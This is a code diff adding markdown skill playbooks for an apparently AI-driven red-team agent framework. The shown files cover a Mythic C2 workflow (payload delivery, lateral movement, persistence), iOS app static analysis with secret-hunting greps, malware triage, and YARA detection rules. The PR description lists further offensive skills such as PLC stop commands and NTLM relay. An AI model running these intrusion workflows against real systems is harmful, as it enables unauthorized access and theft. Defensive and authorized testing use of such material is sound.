+- **Build customization**: Apollo's build config supports custom headers, paths, useragent — match the target's expected traffic pattern (Slack workspace? Use Slack-like headers).
+- **Module loading**: prefer in-memory module loading (Apollo's `load` command) over dropping new files on disk.
+
+## Common workflow
+
+```
+1. Set up Mythic + profiles + agents (1 hr, one-time per engagement)
+2. Stage redirector with HTTPS cert (CloudFront, nginx, ...)
+3. Build payload(s) per target (1 per OS/objective)
+4. Deliver via phish / exploit / pretext
+5. On callback: 'whoami', 'hostname', 'pwd', 'ps' — basic survey
+6. Network enumeration (token mimic, find-domain-controllers, etc.)
+7. Lateral via SMB profile to peers — no new HTTP callbacks
+8. Persistence after objective met
+9. Clean up; teardown
+```
+
+## Comparison vs Sliver / Cobalt Strike / Havoc
+
+| | Mythic | Sliver | Cobalt Strike | Havoc |
+|---|---|---|---|---|
+| **License** | OSS BSD | OSS GPL | $$$ commercial | OSS GPL |
+| **Agent maturity** | Excellent for .NET (Apollo) | Excellent Go single binary | Best-in-class | Improving fast |
+| **UI** | Good web | Web + CLI | Heavy Java client | Modern web |
+| **Detection** | Newer = less fingerprinted | Mid | Heavily detected | Newer |
+| **Multi-agent** | Yes (10+) | Single agent | Single (beacon + ext) | Single |
+| **Best for** | Cross-platform, scripted ops | Single-binary speed | Mature OPSEC | Modern web UI |
+
+## References
+
+- Mythic docs — docs.mythic-c2.net
+- Cody Thomas's "Introducing Mythic" blog series
+- MythicAgents GitHub org — every official agent
+- "OPSEC for Modern C2 Frameworks" — RTO recordings

--- a/packages/decepticon/decepticon/skills/standard/reverser/ios-static/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/reverser/ios-static/SKILL.md
@@ -1,0 +1,162 @@
+---
+name: reverser-ios-static
+description: "iOS IPA static analysis — class-dump-z / class-dump-ng, Hopper / IDA / Ghidra for Mach-O ARM64, Objective-C runtime introspection, Swift demangling, App Transport Security check, plist analysis, embedded provisioning profile parse. For dynamic Frida/Objection see mobile/SKILL.md."
+when_to_use: "ios ipa ios app mach-o arm64 class-dump objective-c swift hopper ghidra plist provisioning profile entitlements"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: reverser
+  tags: ios, mach-o, mobile, static-analysis
+  mitre_attack: T1518.001
+---
+
+# iOS IPA Static Analysis
+
+## Acquire the IPA
+
+```bash
+# Option 1: App Store (encrypted FairPlay — needs decryption from a jailbroken device)
+# Option 2: ipatool — pulls IPAs from your Apple ID
+ipatool download -b com.target.app
+
+# Option 3: Frida-iOS-Dump (jailbroken device required)
+# Pulls a decrypted IPA from the device's memory
+frida-ios-dump -o app.ipa "<bundle-id>"
+```
+
+## Unpack the IPA
+
+```bash
+unzip app.ipa -d app/
+# Structure:
+#   app/Payload/<AppName>.app/
+#     <AppName>                  — Mach-O binary
+#     Info.plist                  — metadata
+#     embedded.mobileprovision    — provisioning profile
+#     en.lproj/, Frameworks/, ...
+```
+
+## Quick triage
+
+```bash
+# 1. Info.plist — capabilities, URL schemes, ATS exceptions
+plutil -p app/Payload/Foo.app/Info.plist
+# Look for:
+#   CFBundleURLTypes           — custom URL schemes (deep links)
+#   LSApplicationQueriesSchemes — schemes the app probes
+#   NSAppTransportSecurity      — ATS exceptions (HTTP allowed?)
+#   UIBackgroundModes          — long-running capabilities
+#   com.apple.developer.*       — entitlements
+
+# 2. Embedded provisioning profile — entitlements + cert chain
+security cms -D -i app/Payload/Foo.app/embedded.mobileprovision | plutil -p -
+# Look for:
+#   Entitlements (push, keychain access, app groups, network extension)
+#   Developer team ID (Apple-issued vs Enterprise)
+
+# 3. Mach-O architecture + protection flags
+file app/Payload/Foo.app/Foo
+otool -hV app/Payload/Foo.app/Foo
+# Flags: PIE (always on for iOS), STACK_PROTECT, MH_NO_HEAP_EXECUTION
+
+# 4. Check encryption status
+otool -l app/Payload/Foo.app/Foo | grep -A4 LC_ENCRYPTION_INFO
+# cryptid 1 = encrypted (decrypt via frida-ios-dump first)
+# cryptid 0 = ready to analyze
+```
+
+## Class-dump (Objective-C metadata)
+
+```bash
+# class-dump-z, class-dump-ng — extract Objective-C interface
+class-dump-z -H app/Payload/Foo.app/Foo -o headers/
+# Output: one .h file per class. Reveals method names, ivars, properties.
+
+# class-dump (newer):
+class-dump --arch arm64 -H app/Payload/Foo.app/Foo -o headers/
+
+# For Swift symbols: swift-demangle
+nm app/Payload/Foo.app/Foo | swift-demangle | head
+```
+
+Headers tell you:
+- Class hierarchy (subclasses of NSObject, UIViewController, etc.)
+- Method signatures (often reveal business logic intent)
+- Properties (often reveal stored data)
+- Use of `NSURLSession` / `NSURLConnection` (network) / `Security.framework` (crypto)
+
+## Disassembly
+
+```bash
+# Hopper Disassembler — UI-focused, decent Obj-C support
+# IDA Pro — best Objective-C / Swift but $$$
+# Ghidra — free, growing iOS support
+# rizin / radare2 — CLI:
+r2 -A app/Payload/Foo.app/Foo
+> afl                                  # function list
+> s sym._-[FooViewController login:]   # navigate to a method
+> pdf                                   # disassemble + decompile (Cutter UI helps)
+```
+
+## Things to look for
+
+### Hardcoded secrets
+```bash
+strings app/Payload/Foo.app/Foo | grep -iE 'api[._-]?key|secret|token|password|bearer'
+strings app/Payload/Foo.app/Foo | grep -iE '^[A-Za-z0-9+/]{40,}={0,2}$'   # base64 candidates
+strings app/Payload/Foo.app/Foo | grep -iE 'sk_live|pk_live|AKIA[0-9A-Z]{16}|AIza[0-9A-Za-z\-_]{35}'  # AWS, Stripe, GCP
+```
+
+### URLs / Endpoints
+```bash
+strings app/Payload/Foo.app/Foo | grep -iE 'https?://' | sort -u
+```
+
+### Backend / firebase config
+```bash
+find app/Payload/Foo.app -name '*.plist' -exec plutil -p {} \; 2>/dev/null | grep -iE 'google|firebase|amazon|azure|api'
+find app/Payload/Foo.app -name 'GoogleService-Info.plist'   # Firebase config
+```
+
+### Insecure ATS exceptions
+```bash
+plutil -p app/Payload/Foo.app/Info.plist | grep -A20 NSAppTransportSecurity
+# NSAllowsArbitraryLoads = true → app allows HTTP. Why?
+# NSExceptionDomains → list of allowed-HTTP domains
+```
+
+### Insecure file storage
+Search the binary for:
+- `NSUserDefaults`-stored secrets (no encryption)
+- `kSecAttrAccessibleAlways` (keychain item accessible always — no device-lock requirement)
+- `NSFileProtectionNone` (file readable when device locked)
+
+### URL scheme handlers
+```bash
+plutil -p app/Payload/Foo.app/Info.plist | grep -A4 CFBundleURLSchemes
+# Each scheme is a potential entry point. Check what method handles it
+# in headers/ — `application:openURL:` or `scene:openURLContexts:`.
+```
+
+### Embedded JS bridge (WebView, React Native, Cordova)
+```bash
+find app/Payload/Foo.app -name '*.bundle' -o -name 'main.jsbundle'   # React Native
+find app/Payload/Foo.app -name 'cordova.js'                          # Cordova
+# These are JavaScript — easier to RE; check for eval, postMessage handlers
+```
+
+## For dynamic analysis
+
+See `/skills/standard/mobile/SKILL.md` (or `/skills/standard/mobile/android/` for the Android counterpart). Use Frida + Objection on a jailbroken device for runtime hooking, SSL pinning bypass, jailbreak detection bypass.
+
+## OPSEC
+
+- Static analysis is invisible to the target — analyze offline on a clean VM.
+- App Store-acquired IPAs are FairPlay-encrypted — decryption requires a jailbroken device, which leaves an Apple-side fingerprint (don't use your personal Apple ID).
+- Symbolicated dSYM files are sometimes shipped to App Store Connect — request from the vendor if you have a bug-bounty relationship.
+
+## References
+
+- "iOS Application Security" — David Thiel (NCC Group book)
+- OWASP MSTG (Mobile Security Testing Guide) — iOS chapter
+- "The Mobile Application Hacker's Handbook"
+- iphone-dev-wiki Mach-O / Objective-C runtime references

--- a/packages/decepticon/decepticon/skills/standard/reverser/malware-triage/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/reverser/malware-triage/SKILL.md
@@ -1,0 +1,142 @@
+---
+name: reverser-malware-triage
+description: "Fast malware triage workflow — static (PE/Mach-O/ELF format, strings, imports, signatures, entropy/packed indicators), dynamic (sandbox with INetSim, Wireshark, Process Monitor, Procmon, time-shift), unpack (Scylla/PE-sieve), then full RE with Ghidra/IDA. Designed for ≤15 min initial verdict."
+when_to_use: "malware triage sample first look static dynamic sandbox cuckoo capemon inetsim wireshark procmon unpack packed entropy yara"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: reverser
+  tags: malware, triage, sandbox, ghidra
+  mitre_attack: T1059, T1518
+---
+
+# Malware Triage — 15 minute first verdict
+
+You have a suspicious binary. Goal: in 15 minutes, decide CLEAN / SUSPICIOUS / MALICIOUS / NEEDS-DEEPER.
+
+## Phase 1: Static (5 min)
+
+```bash
+# 1. File format
+file sample.bin
+exiftool sample.bin                 # author / compile timestamp / version
+
+# 2. Hash + reputation
+sha256sum sample.bin
+# Submit to: VirusTotal, MalwareBazaar, IntelX, Joe Sandbox, ANY.RUN
+# Often the verdict already exists — saves you 14 minutes.
+
+# 3. Strings — fast triage signal
+strings -n 8 sample.bin | sort -u | head -100
+strings -e l -n 8 sample.bin | sort -u | head -50   # wide (UTF-16) strings on Windows
+
+# Suspicious strings to grep for:
+strings sample.bin | grep -iE 'http|https|wmic|powershell|cmd.exe|temp|appdata|amsi|defender|reflectiveloader'
+
+# 4. Format-specific: PE
+peresearcher sample.exe   # OR python pefile
+python3 -c '
+import pefile
+p = pefile.PE("sample.exe")
+print("Compile time:", p.FILE_HEADER.TimeDateStamp)
+print("Sections:", [(s.Name.decode().rstrip("\x00"), s.SizeOfRawData, s.get_entropy()) for s in p.sections])
+print("Imports:", [(e.dll.decode(), [i.name.decode() if i.name else hex(i.ordinal) for i in e.imports]) for e in p.DIRECTORY_ENTRY_IMPORT])
+'
+
+# 5. Entropy → packed?
+python3 -c '
+import math
+data = open("sample.bin","rb").read()
+counts = [data.count(bytes([b])) for b in range(256)]
+total = len(data)
+ent = -sum((c/total)*math.log2(c/total) for c in counts if c)
+print(f"Entropy: {ent:.3f} / 8 — {'packed' if ent > 7.5 else 'normal'}")
+'
+
+# 6. YARA against canonical rulesets
+yara -r /opt/yara-rules/ sample.bin
+yara -r /opt/Neo23x0-signature-base/ sample.bin
+```
+
+## Phase 2: Dynamic (5 min — in an isolated VM)
+
+```bash
+# Pre-flight (do this once, save snapshot)
+# - Disconnected network OR use INetSim/FakeNet-NG to fake services
+# - Procmon recording (Process / File / Network / Registry filters)
+# - Wireshark capturing on the snapshot's network adapter
+# - Fakedns / inetsim listening for DNS / HTTP / SMTP / FTP
+
+# Detonate
+cp sample.bin C:\tmp\sample.exe
+# Right-click → Run as admin OR sample.exe in cmd
+
+# Observe for 60-180 seconds, then take snapshot
+# Then revert VM for next run
+```
+
+### Things to look for
+
+| Signal | Verdict |
+|---|---|
+| Writes to `\AppData\Local\Temp` then executes | Likely dropper |
+| Creates Run/RunOnce registry key | Persistence |
+| Schedules a task | Persistence |
+| Modifies firewall via netsh | Defense evasion |
+| Spawns powershell + LongStringEncoded | Stage 2 |
+| Network: HTTPS to a no-SNI IP | C2 callback |
+| DNS to a DGA-looking domain | C2 callback |
+| Reads process memory of lsass.exe / winlogon.exe | Credential theft |
+| Writes to userinit / shells / image-file-exec-options | Persistence |
+| Touches `\Microsoft\Cryptography\Defaults\Provider` | Cert injection |
+
+## Phase 3: Unpack (if entropy was high, optional 5 min)
+
+```bash
+# In dynamic VM, after detonation, dump memory:
+# Scylla (UI) → attach to process, dump PE image
+# OR PE-sieve (command-line):
+pe-sieve.exe /pid 1234 /dir dumped
+# OR DnSpy + DotNetReactorUnpacker for .NET
+# OR de4dot for obfuscated .NET
+
+# Then static-re the unpacked binary (Phase 1 strings/imports against the dump)
+```
+
+## Phase 4: Verdict + handoff
+
+| Verdict | Indicators | Next step |
+|---|---|---|
+| **CLEAN** | Known-good hash, signed, expected strings/imports, no suspicious behavior | Mark + move on |
+| **SUSPICIOUS** | Unsigned, low rep, mildly unusual imports/strings, no clear malicious behavior | Sandbox 30 min longer, YARA against custom rules |
+| **MALICIOUS** | C2 callback, drops files, persistence, credential theft, packed + evades VMs | IOC extraction, then deep RE (load `reverser/ghidra/SKILL.md`) |
+| **NEEDS-DEEPER** | High entropy, anti-analysis, custom-packed, no obvious signal | Unpack first (Phase 3), then re-triage |
+
+## IOC extraction template
+
+If MALICIOUS:
+- Hashes (md5, sha1, sha256)
+- C2 domains / IPs (from PCAP)
+- Mutex names (Procmon: CreateMutex events)
+- File paths created
+- Registry keys modified
+- YARA signature (generate from unique strings/code)
+
+## Tooling cheatsheet
+
+| Stage | Tool | Use |
+|---|---|---|
+| Static (PE) | pefile, capa, exiftool, Detect It Easy (DIE) | Format + capability scan |
+| Static (ELF) | readelf, objdump, radare2 | Format + symbols |
+| Static (Mach-O) | jtool2, otool, MachOView | Format + symbols |
+| Dynamic | Cuckoo, CAPE, ANY.RUN, Joe Sandbox, Hatching Triage | Automated sandbox |
+| Network | Wireshark, mitmproxy, FakeNet-NG, INetSim | Traffic capture + fake services |
+| Memory | Volatility 3, PE-sieve, Scylla | Memory forensics + unpacking |
+| Disassembly | Ghidra, IDA, Binary Ninja | Full RE — see `reverser/ghidra/SKILL.md` |
+| YARA | yara, capa rules | Signature matching |
+
+## References
+
+- "Practical Malware Analysis" — Sikorski & Honig (still the canonical book)
+- MITRE ATT&CK — for behavior → technique mapping
+- Lenny Zeltser's "REMnux" — pre-built malware analysis distro
+- DEFCON "Malware Forensics" track recordings

--- a/packages/decepticon/decepticon/skills/standard/reverser/yara-hunting/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/reverser/yara-hunting/SKILL.md
@@ -1,0 +1,170 @@
+---
+name: reverser-yara-hunting
+description: "YARA rule authoring + hunting — `condition:` syntax, hex patterns with wildcards, `for`/`any of them`, PE module, ELF module, hash module, math module. Build per-family signatures, hunt at scale via VT/MalwareBazaar/Hybrid Analysis. Avoid common pitfalls (collisions, slow rules, regex traps)."
+when_to_use: "yara rule signature hunting virustotal vt malshare malwarebazaar hybrid analysis pe elf hash condition any all of"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: reverser
+  tags: yara, malware, hunting, signatures
+  mitre_attack: T1518.001
+---
+
+# YARA Rule Authoring + Hunting
+
+## Anatomy of a good rule
+
+```yara
+import "pe"
+import "hash"
+
+rule MalFamily_DropperVariant_Q4_2024 {
+    meta:
+        author = "you"
+        date = "2024-11-20"
+        description = "MalFamily dropper, observed Q4 2024 campaign"
+        hash = "deadbeefdeadbeefdeadbeefdeadbeef"
+        tlp = "amber"
+        confidence = "high"
+        false_positives = "low (test against AV vendor samples)"
+        mitre = "T1055"
+
+    strings:
+        $magic = { 4D 5A 90 00 03 }            // MZ + DOS header
+        $config_marker = { 7A 89 ?? ?? 4F 8C } // 6-byte signature, 2 wildcards
+        $string1 = "loader_stage_2" wide
+        $string2 = "cmd.exe /c " ascii
+        $api1   = "VirtualAllocEx"
+        $api2   = "WriteProcessMemory"
+        $api3   = "CreateRemoteThread"
+        // Avoid generic strings — they cause FPs.
+
+    condition:
+        uint16(0) == 0x5A4D and                    // PE header
+        filesize < 5MB and                          // bounded — avoids huge-file scans
+        $config_marker and                          // unique marker
+        2 of ($api1, $api2, $api3) and             // at least 2 of the 3 process-inject APIs
+        any of ($string*) and
+        pe.imports("ws2_32.dll", "WSAStartup") and  // network capability
+        not pe.is_signed                            // unsigned
+}
+```
+
+## The condition tools you need
+
+```yara
+// Filesize / offset reads (no module)
+filesize > 100KB and filesize < 5MB
+uint32(0x3c) > 0 and uint32(uint32(0x3c)) == 0x4550  // valid PE
+
+// "for" loops over offsets / sections
+for any i in (0..pe.number_of_sections - 1):
+    (pe.sections[i].name == ".text" and pe.sections[i].entropy > 7.0)
+
+// "of"
+1 of them                              // any one string
+all of ($a*)                           // all $a*-prefix strings
+3 of ($s1, $s2, $s3, $s4, $s5)         // at least 3 of 5
+
+// Hash module
+hash.sha256(0, filesize) == "..."      // exact-match rule
+hash.imphash() == "..."                // PE import hash (fragile but high-signal)
+```
+
+## High-leverage patterns
+
+### Family-stable byte patterns
+Look for unique byte sequences that survive obfuscation:
+- Crypto constants (SHA-256 IVs, AES sbox, RC4 init pattern)
+- Hard-coded SID strings
+- C2 packet headers (magic bytes, fixed offsets)
+- Reflective loader entry stub bytes (Donut, Cobalt Strike's PE loader)
+
+### Capability rules
+Don't fingerprint a sample — fingerprint a TECHNIQUE:
+
+```yara
+rule Suspicious_ProcessInjection {
+    meta: description = "VirtualAlloc + WriteProcessMemory + CreateRemoteThread = injection"
+    condition:
+        pe.imports("kernel32.dll", "VirtualAllocEx") and
+        pe.imports("kernel32.dll", "WriteProcessMemory") and
+        pe.imports("kernel32.dll", "CreateRemoteThread")
+}
+```
+
+This catches every injector regardless of family. False-positive: legitimate tools (Procmon, IDA, debuggers). Reduce via additional conditions (unsigned, in temp dir, etc.).
+
+### Anti-analysis fingerprinting
+```yara
+rule AntiVm_VMware_Strings {
+    strings:
+        $s1 = "VMware" ascii nocase
+        $s2 = "VBoxService" ascii nocase
+        $s3 = "qemu" ascii nocase
+        $s4 = { 56 4D 58 68 } // "VMXh" — VMware backdoor port magic
+    condition: 2 of them
+}
+```
+
+## Hunting at scale
+
+### VirusTotal Retrohunt (paid)
+```yara
+// Upload rule to VT — runs against the past 90 days of submissions
+// Outputs new hashes matching the signature
+```
+
+### MalwareBazaar (free)
+```bash
+# yarafs.io / abuse.ch — runs YARA against MB corpus
+curl https://mb-api.abuse.ch/api/v1/ -X POST -d 'query=get_yara&yara_rule=YourRule'
+```
+
+### Local corpus scan
+```bash
+# Recursive scan
+yara -r rules/ /samples/
+# JSON output for downstream processing
+yara -r rules/ /samples/ -m -p 4    # -m: metadata, -p: parallel threads
+
+# Fast pre-filter with capa first
+capa /samples/sample.exe   # extracts capabilities; rule-driven, JSON-output
+```
+
+## Common pitfalls
+
+| Pitfall | Fix |
+|---|---|
+| Too-short strings (4 bytes) → false positives | Use 8+ byte strings; require multiple matches |
+| Regex `/pattern/` with `[`, `?`, `*` → slow | Prefer literal strings; if regex needed, anchor with `^`/`\b` |
+| No filesize bound → scans 5GB files | Always include `filesize < N` |
+| Multiple wildcards in one hex `??` → exponential matcher cost | Limit to 2-3 wildcards per byte string |
+| `condition: any of them` with one common string → constant FPs | Use `2 of them` minimum |
+| Rule name with version | Use a separate `meta.version` so rule survives bumps |
+
+## Mass-hunt workflow
+
+1. Triage a sample (see `reverser/malware-triage` skill)
+2. Extract unique byte patterns, strings, capabilities
+3. Write a YARA rule with `meta` for context + bounded `condition`
+4. Test against:
+   - The known sample (must match)
+   - A clean corpus (must NOT match — false positive rate)
+   - A different malware family corpus (must NOT match)
+5. Submit to VT Retrohunt + MalwareBazaar
+6. Track results, iterate
+
+## Tooling
+
+- `yara` / `yara-python` (writing + running)
+- `yarGen` (auto-generate rules from a sample set)
+- `valhalla.nextron-systems.com` (commercial YARA feed by Florian Roth)
+- `Neo23x0/signature-base` (open-source canonical rule set)
+- `capa` (Mandiant — capability-level rules)
+
+## References
+
+- VirusTotal YARA guide
+- "YARA, the pattern matching swiss knife for malware researchers"
+- Florian Roth's blog (the canonical YARA author of our era)
+- "Practical YARA Rules" — Andre Tavares


### PR DESCRIPTION
## Summary

23 new domain-specific skill playbooks across 8 attack surfaces that Decepticon agents currently have no coverage for. All placed under correct loader paths (`packages/decepticon/decepticon/skills/standard/<role>/`) so the role-specific `SkillsMiddleware` source picks them up at agent boot. Zero Python runtime changes, zero dependency changes, zero compose changes — pure additive markdown.

## New skills (29 files = 23 child skills + 3 new parent indices + 3 referenced indices)

### Container / Kubernetes (under `cloud` agent)
- **k8s-pod-escape** — privileged container, hostPath, hostPID+SYS_PTRACE, runC CVE chains, cgroup release_agent, SA-token API abuse
- **k8s-rbac-abuse** — `can-i` enumeration, pods/exec, secrets get/list, escalate/bind/impersonate verbs, nodes/proxy bypass
- **docker-socket-mount** — docker.sock + containerd.sock + crio.sock primitives, CI/CD common mounts
- **container-cve** — Leaky Vessels (CVE-2024-21626), BuildKit chain, CVE-2019-5736 runC, CVE-2022-0185, CRI-O CVE-2022-0811
- **container/SKILL.md** — routing index

### Cloud advanced (under `cloud` agent)
- **azure-managed-identity** — IMDS 169.254 token, App Service / Function `IDENTITY_ENDPOINT`, Workload Identity Federation, AAD Connect MSOL extraction
- **gcp-svc-account-impersonation** — TokenCreator, key creation, Lambda / Cloud Functions / SageMaker / startup-script PassRole chains
- **aws-iam-passrole-chain** — full Pacu privesc table + Lambda/Glue/EC2/SageMaker chains, cross-account AssumeRole

### Modern API (under `exploit` agent)
- **grpc** — reflection discovery, protobuf fuzzing, streaming-RPC authz, h2c smuggling, mTLS SNI bypass, gRPC-Web SSRF
- **soap-wsdl** — WSDL enum, XXE in envelope, WS-Security UsernameToken, WS-Addressing replay, XML Signature Wrapping, SOAPAction routing confusion
- **websocket** — CSWSH (origin bypass), missing per-message authz, message-type confusion, hidden RPC routes, SignalR/STOMP/Socket.IO
- **server-sent-events** — cross-origin streaming exfil, prompt injection into LLM frontends, Last-Event-ID token leak
- **api/SKILL.md** — routing index

### ICS / OT (under `exploit` agent)
- **modbus** — TCP/502 enum, coil/register r/w, FC43 device ID, FC8 Listen-Only DoS, bulk-write tamper
- **bacnet** — UDP/47808 Who-Is/I-Am, ReadProperty/WriteProperty, binary-output override, COV subscription tap, BBMD pivot
- **s7comm** — TCP/102 snap7, DB/M/E/A area r/w, `plc_stop`/start, S7-300/400 vs S7-1200/1500 auth differences, CVE-2019-10936
- **dnp3** — TCP/20000 outstation enum, CROB breaker trip, unsolicited report tampering, DNP3-SA downgrade
- **ics-ot/SKILL.md** — routing index with **safety warning** for write-class operations

### Advanced smart contracts (under `contracts` agent)
- **mev-sandwich** — front-run + back-run on Uniswap V2/V3, JIT liquidity, multi-block MEV, Flashbots bundle construction
- **governance-attack** — Beanstalk-class flash-loan votes, delegation hijack, quorum dilution, time-lock bypass, snapshot/on-chain desync
- **bridge-exploit** — Wormhole/Ronin/Nomad-class — validator key compromise, Merkle-proof forgery, cross-chain replay, reentrancy on claim

### Advanced Active Directory (under `ad` agent)
- **coercer** — PetitPotam/PrinterBug/DFSCoerce/ShadowCoerce + Coercer.py, relay-or-crack decision tree, DC$-coerce → DA chain
- **certipy-esc-chain** — full ESC1-ESC15 catalog with Certipy commands, ESC8 NTLM-relay-to-ADCS, ESC9/10 UPN mapping abuse
- **ntlm-relay** — `ntlmrelayx` target matrix (SMB/LDAP/HTTP/MSSQL/etc), SMB-signing bypass, `--gen-relay-list` workflow, when-to-relay-vs-crack

### Reverser advanced (under `reverser` agent)
- **malware-triage** — 15-minute first-verdict workflow (static + dynamic + unpack), IOC extraction template, sandbox patterns
- **yara-hunting** — rule authoring with PE/hash modules, anti-FP patterns, capability rules, VT Retrohunt + MalwareBazaar hunt workflow
- **ios-static** — IPA unpack, class-dump, Mach-O ARM64, plist analysis, hardcoded-secret hunt patterns

### C2 framework operators (under `post-exploit` agent)
- **mythic** — multi-agent (Apollo/Apfell/Poseidon/Athena/Medusa) framework, profile matrix, mythic-cli build, GraphQL tasking
- **havoc** — C5pider's Havoc Demon agent, sleep obfuscation (Ekko/Zilean/FOLIAGE), indirect syscalls, comparison vs Sliver/CS/Mythic

## Discovery / loader correctness

Each skill is placed under the path that its target agent loads via `SkillsMiddleware(sources=...)`:

- `cloud_hunter` agent loads `/skills/standard/cloud/...` → container/, azure-managed-identity, gcp-svc-account-impersonation, aws-iam-passrole-chain
- `exploit` agent loads `/skills/standard/exploit/...` → api/, ics-ot/
- `contract_auditor` agent loads `/skills/standard/contracts/...` → mev-sandwich, governance-attack, bridge-exploit
- `ad_operator` agent loads `/skills/standard/ad/...` → coercer, certipy-esc-chain, ntlm-relay
- `reverser` agent loads `/skills/standard/reverser/...` → malware-triage, yara-hunting, ios-static
- `postexploit` agent loads `/skills/standard/post-exploit/...` → c2/mythic, c2/havoc

All frontmatter uses the standard `name` / `description` / `when_to_use` / `mitre_attack` schema. The `when_to_use` keywords are tuned for high-recall matching against operator objectives.

## Risk

None. All new files, no edits to existing code or skills.

## Relationship to other open PRs

- Does **not** overlap with #281's skill additions (different file paths/names; both add to the same parent dirs harmlessly).
- Does **not** overlap with #290's skill content (which is removed from #290 by design — overlaps avoided).
- Builds cleanly on `upstream/main` — no rebase needed when other PRs merge.
